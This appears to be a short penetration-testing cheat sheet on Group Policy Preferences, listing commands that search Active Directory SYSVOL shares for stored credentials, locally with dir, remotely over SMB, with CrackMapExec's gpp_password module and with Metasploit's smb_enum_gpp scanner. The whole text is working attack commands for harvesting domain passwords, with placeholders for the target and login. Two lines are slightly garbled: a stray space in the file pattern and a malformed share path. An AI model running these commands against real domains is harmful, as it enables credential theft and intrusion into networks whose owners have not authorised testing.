Group Policy Preferences

# Enumerating credentials directory on the SYSVOL share
dir /s * .xml

# Enumerating credentials remotely from SYSVOL
dir /s \\[FQN]\SYSVOL\[FQDN\ | more

# Enumerating credentials remotely using CrackMapExec
crackmapexec smb $ip -u $username -p $password -M gpp_password

# Enumerating credentials remotely using Metasploit
use auxiliary/scanner/smb/smb_enum_gpp
set rhosts $ip
set SMBUser $username
set SMBPass $password
run